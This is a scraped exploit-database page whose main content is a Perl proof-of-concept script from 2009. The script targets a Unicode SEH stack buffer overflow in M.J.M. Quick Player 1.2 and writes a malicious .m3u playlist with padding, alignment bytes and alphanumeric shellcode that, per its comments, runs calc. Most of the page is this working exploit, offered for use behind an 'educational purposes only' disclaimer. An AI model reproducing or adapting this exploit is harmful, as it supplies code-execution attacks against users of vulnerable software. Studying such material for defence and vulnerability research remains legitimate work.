|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  ExploitAlert Database |
||
ExploitAlert : 7613 Credit : corelanc0d3r Date : 28.12.2009 Exploit Code : # [*] Vulnerability : M.J.M. Quick Player v1.2 Stack BOF # [*] Discovered by : mr_me (seeleymagic[at]hotmail[dot]com) # [*] Sploit written by : corelanc0d3r (corelanc0d3r[at]gmail[dot]com) # [*] Sploit released : dec 28th, 2009 # [*] Type : local and remote code execution # [*] OS : Windows # [*] Product : M.J.M. Quick Player # [*] Versions affected : 1.2 (Latest version is not vulnerable) # [*] Download from : http://www.brothersoft.com/quick-player-135853.html # [*] ------------------------------------------------------------------------- # [*] Method : SEH / Unicode # [*] Tested on : XP SP3 En (VirtualBox) # [*] Greetz&Tx to : mr_me/EdiStrosar/Rick2600/MarkoT # [*] ------------------------------------------------------------------------- # MMMMM~. # MMMMM?. # MMMMMM8. .=MMMMMMM.. MMMMMMMM, MMMMMMM8. MMMMM?. MMMMMMM: MMMMMMMMMM. # MMMMMMMMMM=.MMMMMMMMMMM.MMMMMMMM=MMMMMMMMMM=.MMMMM?7MMMMMMMMMM: MMMMMMMMMMM: # MMMMMIMMMMM+MMMMM$MMMMM=MMMMMD$I8MMMMMIMMMMM~MMMMM?MMMMMZMMMMMI.MMMMMZMMMMM : # MMMMM==7III~MMMMM=MMMMM=MMMMM$. 8MMMMMZ$$$$$~MMMMM?..MMMMMMMMMI.MMMMM+MMMMM: # MMMMM=. MMMMM=MMMMM=MMMMM7. 8MMMMM? . MMMMM?NMMMM8MMMMMI.MMMMM+MMMMM: # MMMMM=MMMMM+MMMMM=MMMMM=MMMMM7. 8MMMMM?MMMMM:MMMMM?MMMMMIMMMMMO.MMMMM+MMMMM: # =MMMMMMMMMZ~MMMMMMMMMM8~MMMMM7. .MMMMMMMMMMO:MMMMM?MMMMMMMMMMMMIMMMMM+MMMMM: # .:$MMMMMO7:..+OMMMMMO$=.MMMMM7. ,IMMMMMMO$~ MMMMM?.?MMMOZMMMMZ~MMMMM+MMMMM: # .,,,.. .,,,,. .,,,,, ..,,,.. .,,,,.. .,,...,,,. .,,,,..,,,,. # eip hunters # --------------------------------------------------------------------------- -- # Script provided 'as is', without any warranty. # Use for educational purposes only. # # Open file in playlist - calc ! # print "[+] Preparing payload\n"; my $sploitfile="corelanc0d3r_quicksploit.m3u"; my $header="#EXTM3U\n\nHTTP://"; my $junk="A" x 529; my $field1="\x41\x6d"; my $field2="\x41\x4d"; #boy I love pvefindaddr :-) my $stuff="\x58\x6d"; $stuff=$stuff."\x05\x02\x01\x6d"; $stuff=$stuff."\x2d\x01\x01\x6d"; $stuff=$stuff."\x50\x6d\xc3"; my $morestuff="D" x 111; # I think this will execute calc :-) my $shellcode="PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIA J11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBTKJL2HO0Q U48QUQXBC1Q2L2C4MPEL80P6XLMO53VSLKOHPP1WSKOXPA"; my $payload=$header.$junk.$field1.$field2.$stuff.$morestuff.$shellcode; print "[+] Writing payload to file\n"; open(FILE,">$sploitfile"); print FILE $payload; close(FILE); print "[+] Wrote ".length($payload)." bytes to ".$sploitfile."\n";  Feedback : If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com. |
||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
| PHP | |
|
» libzip 0.9.3 |
||
| ADT | ||
Protect your family and valuables with Home Security Systems |
||
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |